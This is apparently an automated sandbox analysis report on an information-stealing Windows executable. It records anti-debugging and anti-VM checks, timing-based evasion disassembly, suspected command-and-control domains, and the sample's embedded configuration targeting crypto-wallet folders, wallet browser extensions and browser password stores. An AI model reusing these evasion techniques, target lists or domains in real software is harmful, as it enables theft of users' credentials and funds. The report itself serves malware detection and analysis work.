                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0012 second address: 49D0067 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602E9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F05491602DEh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F05491602DCh 0x00000019 sbb esi, 7AB80098h 0x0000001f jmp 00007F05491602DBh 0x00000024 popfd 0x00000025 mov esi, 6F3C364Fh 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0067 second address: 49D00CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119945h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F054911993Eh 0x0000000f mov ebp, esp 0x00000011 jmp 00007F0549119940h 0x00000016 xchg eax, ecx 0x00000017 jmp 00007F0549119940h 0x0000001c push eax 0x0000001d pushad 0x0000001e call 00007F054911993Ch 0x00000023 mov cx, F191h 0x00000027 pop esi 0x00000028 popad 0x00000029 xchg eax, ecx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D00CD second address: 49D00D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D00D1 second address: 49D00E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119942h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D00E7 second address: 49D00F9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DEh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D015B second address: 49D0161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0161 second address: 49D0165 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0165 second address: 49D0169 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0D90 second address: 49D0DF1 instructions: 0x00000000 rdtsc 0x00000002 call 00007F05491602E5h 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push ebx 0x0000000c pushad 0x0000000d movzx ecx, dx 0x00000010 call 00007F05491602DFh 0x00000015 mov ch, B2h 0x00000017 pop edi 0x00000018 popad 0x00000019 mov dword ptr [esp], ebp 0x0000001c jmp 00007F05491602E0h 0x00000021 mov ebp, esp 0x00000023 push eax 0x00000024 push edx 0x00000025 jmp 00007F05491602E7h 0x0000002a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0DF1 second address: 49D0E47 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [76C8459Ch], 05h 0x00000010 jmp 00007F054911993Eh 0x00000015 je 00007F05BB367512h 0x0000001b pushad 0x0000001c mov eax, 0734277Dh 0x00000021 mov ax, BE79h 0x00000025 popad 0x00000026 pop ebp 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F054911993Eh 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0E47 second address: 49D0E4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0E4B second address: 49D0E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0E51 second address: 49D0E62 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F05491602DDh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0ECE second address: 49D0EEF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 1C2885D1h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov si, CB97h 0x00000015 mov esi, 0CD08A33h 0x0000001a popad 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0EEF second address: 49D0EF5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49D0EF5 second address: 49D0F4E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F054911993Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xor dword ptr [esp], 6AEF19F9h 0x00000012 jmp 00007F0549119946h 0x00000017 call 00007F05BB36E585h 0x0000001c push 76C22B70h 0x00000021 push dword ptr fs:[00000000h] 0x00000028 mov eax, dword ptr [esp+10h] 0x0000002c mov dword ptr [esp+10h], ebp 0x00000030 lea ebp, dword ptr [esp+10h] 0x00000034 sub esp, eax 0x00000036 push ebx 0x00000037 push esi 0x00000038 push edi 0x00000039 mov eax, dword ptr [76C84538h] 0x0000003e xor dword ptr [ebp-04h], eax 0x00000041 xor eax, ebp 0x00000043 push eax 0x00000044 mov dword ptr [ebp-18h], esp 0x00000047 push dword ptr [ebp-08h] 0x0000004a mov eax, dword ptr [ebp-04h] 0x0000004d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000054 mov dword ptr [ebp-08h], eax 0x00000057 lea eax, dword ptr [ebp-10h] 0x0000005a mov dword ptr fs:[00000000h], eax 0x00000060 ret 0x00000061 jmp 00007F0549119940h 0x00000066 sub esi, esi 0x00000068 pushad 0x00000069 mov ch, bl 0x0000006b movzx ecx, di 0x0000006e popad 0x0000006f mov dword ptr [ebp-1Ch], esi 0x00000072 push eax 0x00000073 push edx 0x00000074 pushad 0x00000075 mov si, 6DE3h 0x00000079 push ecx 0x0000007a pop ebx 0x0000007b popad 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0A90 second address: 49E0ABC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, C2DAh 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e jmp 00007F05491602E7h 0x00000013 xchg eax, esi 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0ABC second address: 49E0AC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0AC0 second address: 49E0AC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0AC4 second address: 49E0ACA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0ACA second address: 49E0B19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F05491602DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F05491602DBh 0x0000000f xchg eax, esi 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 mov dx, F566h 0x00000017 pushfd 0x00000018 jmp 00007F05491602E7h 0x0000001d jmp 00007F05491602E3h 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0B19 second address: 49E0BDF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0549119949h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, dword ptr [ebp+0Ch] 0x0000000c jmp 00007F054911993Eh 0x00000011 test esi, esi 0x00000013 jmp 00007F0549119940h 0x00000018 je 00007F05BB357194h 0x0000001e pushad 0x0000001f push ecx 0x00000020 pushfd 0x00000021 jmp 00007F054911993Dh 0x00000026 sub si, D836h 0x0000002b jmp 00007F0549119941h 0x00000030 popfd 0x00000031 pop esi 0x00000032 pushad 0x00000033 pushfd 0x00000034 jmp 00007F0549119947h 0x00000039 adc eax, 4894556Eh 0x0000003f jmp 00007F0549119949h 0x00000044 popfd 0x00000045 popad 0x00000046 popad 0x00000047 cmp dword ptr [76C8459Ch], 05h 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 call 00007F054911993Fh 0x00000056 pop ecx 0x00000057 pushad 0x00000058 popad 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0C72 second address: 49E0C96 instructions: 0x00000000 rdtsc 0x00000002 mov ebx, 2DA71AACh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F05491602E7h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0C96 second address: 49E0CE8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 pushfd 0x00000006 jmp 00007F054911993Bh 0x0000000b adc ax, E30Eh 0x00000010 jmp 00007F0549119949h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esp], esi 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007F0549119948h 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0CE8 second address: 49E0CEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0CEC second address: 49E0CF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0CF2 second address: 49E0CF8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0CF8 second address: 49E0CFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRDTSC instruction interceptor: First address: 49E0CFC second address: 49E0D00 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSpecial instruction interceptor: First address: C7B63 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSpecial instruction interceptor: First address: C7C3C instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSpecial instruction interceptor: First address: 2F7BF7 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404Thread sleep time: -240000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exe TID: 3404Thread sleep time: -30000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\PackagesJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\MozillaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\PeerDistRepubJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\3D ObjectsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\CommsJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\GoogleJump to behavior
                Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577677042.000000000527F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696494690p
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696494690f
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696494690s
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696494690p
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696494690n
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696494690d
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696494690u
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696494690t
                Source: 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.0000000000999000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000002.1707655021.00000000009F2000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009F9000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1529875144.00000000009E8000.00000004.00000020.00020000.00000000.sdmp, 0gnHF2twcT.exe, 00000000.00000003.1508244562.00000000009E8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696494690}
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696494690x
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690^
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696494690z
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696494690h
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696494690o
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696494690~
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696494690j
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696494690t
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696494690x
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690}
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696494690]
                Source: 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696494690x
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696494690
                Source: 0gnHF2twcT.exe, 00000000.00000003.1577815774.0000000005216000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696494690|UE
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                barindex
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeThread information set: HideFromDebuggerJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: regmonclass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: ollydbg
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: filemonclass
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: NTICE
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: SICE
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: SIWVID
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeProcess queried: DebugPortJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeProcess queried: DebugPortJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0gnHF2twcT.exeString found in binary or memory: rapeflowwj.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: crosshuaht.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: sustainskelet.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: aspecteirs.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: energyaffai.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: necklacebudi.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: discokeyus.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: grannyejh.lat
                Source: 0gnHF2twcT.exeString found in binary or memory: sweepyribs.lat
                Source: 0gnHF2twcT.exe, 0gnHF2twcT.exe, 00000000.00000002.1707073735.0000000000250000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: ZProgram Manager
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                Source: 0gnHF2twcT.exe, 00000000.00000003.1661698239.0000000000A4C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: 0gnHF2twcT.exe PID: 1464, type: MEMORYSTR
                Source: 0gnHF2twcT.exeString found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
                Source: 0gnHF2twcT.exeString found in binary or memory: "t":0,"p":"%appdata%\\Electrum-LTC\\wallets","m":["*"],"z":"Wallets/Electrum-LTC","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\ElectronCash\\wallets","m":["*"],"z":"Wallets/ElectronCash","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Guarda\\IndexedDB","m":["*"],"
                Source: 0gnHF2twcT.exeString found in binary or memory: json"],"z":"Wallets/Binance","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\com.liberty.jaxx\\IndexedDB","m":["*"],"z":"Wallets/JAXX New Version","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Electrum\\wallets","m":["*"],"z":"Wallets/Electrum","d":0,"fs":20971520},
                Source: 0gnHF2twcT.exeString found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
                Source: 0gnHF2twcT.exeString found in binary or memory: e"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":2,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"],"z":"Wallets/Ledger Live","d":2,"fs":20971520},{"t":0,"p":"%appdata%
                Source: 0gnHF2twcT.exeString found in binary or memory: jfbodiccabbabgimdeohkkpjfpbnf","ez":"Rainbow"},{"en":"jiidiaalihmmhddjgbnbgdfflelocpak","ez":"Bitget Wallet"}],"mx":[{"en":"webextension@metamask.io","ez":"MetaMask","et":"\"params\":{\"iterations\":600000}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keysto
                Source: 0gnHF2twcT.exe, 00000000.00000003.1601941618.0000000000A34000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                Source: 0gnHF2twcT.exeString found in binary or memory: keystore
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\0gnHF2twcT.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
